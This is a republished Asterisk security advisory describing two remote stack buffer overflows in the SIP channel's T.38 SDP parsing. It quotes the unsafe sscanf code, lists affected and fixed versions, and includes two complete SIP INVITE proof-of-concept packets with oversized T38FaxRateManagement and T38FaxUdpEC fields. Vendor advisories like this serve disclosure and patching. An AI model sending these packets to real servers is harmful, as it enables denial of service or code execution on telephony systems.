Two stack buffer overflows in SIP channel's T.38 SDP parsing code

Advisory Content :

> Asterisk Project Security Advisory - ASA-2007-010
>
>
+-----------------------------------------------------------------------
-+
> | Product | Asterisk
|
>
|--------------------+--------------------------------------------------
-|
> | Summary | Two stack buffer overflows in SIP channel's
T.38 |
> | | SDP parsing code
|
>
|--------------------+--------------------------------------------------
-|
> | Nature of Advisory | Exploitable Stack Buffer Overflow
|
>
|--------------------+--------------------------------------------------
-|
> | Susceptibility | Remote Unauthenticated Sessions
|
>
|--------------------+--------------------------------------------------
-|
> | Severity | Moderate
|
>
|--------------------+--------------------------------------------------
-|
> | Exploits Known | No
|
>
|--------------------+--------------------------------------------------
-|
> | Reported On | March 22, 2007
|
>
|--------------------+--------------------------------------------------
-|
> | Reported By | Barrie Dempster, NGS Software,
|
> | | <barrie (at) ngssoftware (dot) com [email
concealed]> |
>
|--------------------+--------------------------------------------------
-|
> | Posted On | April 24, 2007
|
>
|--------------------+--------------------------------------------------
-|
> | Last Updated On | April 24, 2007
|
>
|--------------------+--------------------------------------------------
-|
> | Advisory Contact | kpfleming (at) digium (dot) com [email
concealed] |
>
+-----------------------------------------------------------------------
-+
>
> +-----------------------------------------------------------------------
-------------+
> |Description|Two closely related stack based buffer overflows exist in
the SIP/SDP |
> | |handler of Asterisk, the vulnerabilities are very similar
but exist as |
> | |two separate unsafe function calls. The T38FaxRateManagement
and |
> | |T38FaxUdpEC SDP parameters can be exploited remotely leading
to |
> | |arbitrary code execution without authentication. In order
for these |
> | |overflows to occur, t38 fax over SIP must be enabled in
sip.conf. |
> | |Examples of SIP INVITE packets are shown below, however
these |
> | |vulnerabilities can be triggered with a number of different
SIP messages|
> | |affecting calls received by Asterisk, or in response to
calls made by |
> | |Asterisk.
|
> | |
|
> | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP
|
> | |T38FaxRateManagement parameter
|
> | |
|
> | |A remote unauthenticated stack overflow exists in the
SIP/SDP handler of|
> | |Asterisk. By sending a SIP packet with SDP data which
includes an overly|
> | |long T38 parameter it is possible to overflow a stack based
buffer and |
> | |execute arbitrary code.
|
> | |
|
> | |The process_sdp function of chan_sip.c in Asterisk contains
the |
> | |following vulnerable call to sscanf.
|
> | |
|
> | |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
|
> | |
|
> | |found = 1;
|
> | |
|
> | |if (option_debug > 2)
|
> | |
|
> | |ast_log(LOG_DEBUG, "RateMangement: %sn", s);
|
> | |
|
> | |if (!strcasecmp(s, "localTCF"))
|
> | |
|
> | |peert38capability |=
|
> | |
|
> | |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
|
> | |
|
> | |else if (!strcasecmp(s, "transferredTCF"))
|
> | |
|
> | |peert38capability |=
|
> | |
|
> | |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
|
> | |
|
> | |This attempts to read the "T38FaxRateManagement:" option
from the SDP |
> | |within a SIP packet and copy the succeeding string into "s".
There are |
> | |no checks on the length of this string and we can therefore
write past |
> | |the boundaries of the "s" variable overwriting adjacent
memory on the |
> | |stack. "s" is defined earlier in this function as being a
character |
> | |array of only 256 bytes. The following example packet
demonstrates an |
> | |overflow of this parameter:
|
> | |
|
> | |INVITE sip:200 (at) 127.0.0 (dot) 1 [email concealed]
SIP/2.0 |
> | |
|
> | |Date: Wed, 21 Mar 2007 4:20:09 GMT
|
> | |
|
> | |CSeq: 1 INVITE
|
> | |
|
> | |Via: SIP/2.0/UDP
|
> | |
|
> |
|10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rpor
t|
> | |
|
> | |User-Agent: NGS/2.0
|
> | |
|
> | |From: "Barrie Dempster"
|
> | |
|
> | |<sip:zeedo (at) 10.0.0 (dot) 123 [email
concealed]:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
> | |
|
> | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
|
> | |
|
> | |To: <sip:200@localhost>
|
> | |
|
> | |Contact: <sip:zeedo (at) 10.0.0 (dot) 123 [email
concealed]:5068;transport=udp> |
> | |
|
> | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
|
> | |
|
> | |Content-Type: application/sdp
|
> | |
|
> | |Content-Length: 796
|
> | |
|
> | |Max-Forwards: 70
|
> | |
|
> | |v=0
|
> | |
|
> | |o=rtp 1160124458839569000 160124458839569000 IN IP4
127.0.0.1 |
> | |
|
> | |s=-
|
> | |
|
> | |c=IN IP4 127.0.0.1
|
> | |
|
> | |t=0 0
|
> | |
|
> | |m=image 5004 UDPTL t38
|
> | |
|
> | |a=T38FaxVersion:0
|
> | |
|
> | |a=T38MaxBitRate:14400
|
> | |
|
> | |a=T38FaxMaxBuffer:1024
|
> | |
|
> | |a=T38FaxMaxDatagram:238
|
> | |
|
> |
|a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> | |AAAAAAAAAAAAAAAA
|
> | |
|
> | |a=T38FaxUdpEC:t38UDPRedundancy
|
> | |
|
> | |-------------------------------------------------
|
> | |
|
> | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP
T38FaxUdpEC |
> | |parameter
|
> | |
|
> | |A remote unauthenticated stack overflow exists in the
SIP/SDP handler of|
> | |Asterisk. By sending a SIP packet with SDP data which
includes an overly|
> | |long T38FaxUdpEC parameter it is possible to overflow a
stack based |
> | |buffer and execute arbitrary code.
|
> | |
|
> | |The process_sdp function of chan_sip.c in Asterisk contains
the |
> | |following vulnerable call to sscanf.
|
> | |
|
> | |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
|
> | |
|
> | |found = 1;
|
> | |
|
> | |if (option_debug > 2)
|
> | |
|
> | |ast_log(LOG_DEBUG, "UDP EC: %sn", s);
|
> | |
|
> | |if (!strcasecmp(s, "t38UDPRedundancy")) {
|
> | |
|
> | |peert38capability |=
|
> | |
|
> | |T38FAX_UDP_EC_REDUNDANCY;
|
> | |
|
> | |ast_udptl_set_error_correction_scheme(p->udptl,
|
> | |
|
> | |UDPTL_ERROR_CORRECTION_REDUNDANCY);
|
> | |
|
> | |This attempts to read the "T38FaxUdpEC:" option from the SDP
within a |
> | |SIP packet and copy the succeeding string into "s". There
are no checks |
> | |on the length of this string and we can therefore write past
the |
> | |boundaries of the "s" variable overwriting adjacent memory
on the stack.|
> | |"s" is defined earlier in this function as being a character
array of |
> | |only 256 bytes. The following example packet demonstrates an
overflow of|
> | |this parameter:
|
> | |
|
> | |INVITE sip:200 (at) 127.0.0 (dot) 1 [email concealed]
SIP/2.0 |
> | |
|
> | |Date: Wed, 21 Mar 2007 4:20:09 GMT
|
> | |
|
> | |CSeq: 1 INVITE
|
> | |
|
> | |Via: SIP/2.0/UDP
|
> | |
|
> |
|10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rpor
t|
> | |
|
> | |User-Agent: NGS/2.0
|
> | |
|
> | |From: "Barrie Dempster"
|
> | |
|
> | |<sip:zeedo (at) 10.0.0 (dot) 123 [email
concealed]:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
> | |
|
> | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
|
> | |
|
> | |To: <sip:200@localhost>
|
> | |
|
> | |Contact: <sip:zeedo (at) 10.0.0 (dot) 123 [email
concealed]:5068;transport=udp> |
> | |
|
> | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
|
> | |
|
> | |Content-Type: application/sdp
|
> | |
|
> | |Content-Length: 796
|
> | |
|
> | |Max-Forwards: 70
|
> | |
|
> | |v=0
|
> | |
|
> | |o=rtp 1160124458839569000 160124458839569000 IN IP4
127.0.0.1 |
> | |
|
> | |s=-
|
> | |
|
> | |c=IN IP4 127.0.0.1
|
> | |
|
> | |t=0 0
|
> | |
|
> | |m=image 5004 UDPTL t38
|
> | |
|
> | |a=T38FaxVersion:0
|
> | |
|
> | |a=T38MaxBitRate:14400
|
> | |
|
> | |a=T38FaxMaxBuffer:1024
|
> | |
|
> | |a=T38FaxMaxDatagram:238
|
> | |
|
> |
|a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
|
> | |AAAAAAAAA
|
> +-----------------------------------------------------------------------
-------------+
>
>
+-----------------------------------------------------------------------
-+
> | Resolution | T.38 support in the affected versions of Asterisk is
not |
> | | enabled by default, therefore the severity of this
issue |
> | | is 'moderate'.
|
> | |
|
> | | Users who are using the default configuration with
|
> | | 't38_udptl' set to 'no' or an equivalent value are not
|
> | | susceptible to this vulnerability. Users who have set
|
> | | this configuration item to 'yes' or an equivalent value
|
> | | but are not actually using T.38 support can set it to
|
> | | 'no' to secure their systems against this
vulnerability. |
> | |
|
> | | All other users are urged to upgrade to the appropriate
|
> | | version of their Asterisk product listed in the
|
> | | 'Corrected In' section below.
|
>
+-----------------------------------------------------------------------
-+
>
>
+-----------------------------------------------------------------------
-+
> | Affected Versions
|
>
|-----------------------------------------------------------------------
-|
> | Product | Release |
|
> | | Series |
|
>
|------------------------------+-------------+--------------------------
-|
> | Asterisk Open Source | 1.0.x | not affected; does not
|
> | | | contain T.38 support
|
>
|------------------------------+-------------+--------------------------
-|
> | Asterisk Open Source | 1.2.x | not affected, does not
|
> | | | contain T.38 support
|
>
|------------------------------+-------------+--------------------------
-|
> | Asterisk Open Source | 1.4.x | all releases prior to
|
> | | | 1.4.3
|
>
|------------------------------+-------------+--------------------------
-|
> | Asterisk Business Edition | A.x.x | not affected, does not
|
> | | | contain T.38 support
|
>
|------------------------------+-------------+--------------------------
-|
> | Asterisk Business Edition | B.x.x | not affected, does not
|
> | | | contain T.38 support
|
>
|------------------------------+-------------+--------------------------
-|
> | AsteriskNOW | pre-release | all releases prior to
and |
> | | | including Beta 5
|
>
|------------------------------+-------------+--------------------------
-|
> | Asterisk Appliance Developer | 0.x.x | all releases prior to
|
> | Kit | | 0.4.0
|
>
+-----------------------------------------------------------------------
-+
>
>
+-----------------------------------------------------------------------
-+
> | Corrected In
|
>
|-----------------------------------------------------------------------
-|
> | Product | Release
|
>
|--------------------+--------------------------------------------------
-|
> | Asterisk Open | 1.4.3, available from
|
> | Source | ftp://ftp.digium.com/pub/telephony/asterisk
|
>
|--------------------+--------------------------------------------------
-|
> | AsteriskNOW | Beta 6, when available from
|
> | | http://www.asterisknow.org, Beta 5 users can
use |
> | | use 'System Update' in the appliance control
|
> | | panel to update their version of AsteriskNOW
|
>
|--------------------+--------------------------------------------------
-|
> | Asterisk Appliance | 0.4.0, available from
|
> | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk
|
>
+-----------------------------------------------------------------------
-+
>
>
+-----------------------------------------------------------------------
-+
> | Links |
|
>
+-----------------------------------------------------------------------
-+
>
>
+-----------------------------------------------------------------------
-+
> | Asterisk Project Security Advisories are posted at
|
> | http://www.asterisk.org/security.
|
> |
|
> | This document may be superseded by later versions; if so, the latest
|
> | version will be posted at
|
> | http://www.asterisk.org/files/ASA-2007-010.pdf.
|
>
+-----------------------------------------------------------------------
-+
>
> Asterisk Project Security Advisory - ASA-2007-010
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in
its
> original, unaltered form.

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

Two stack buffer overflows in SIP channel's T.38 SDP parsing code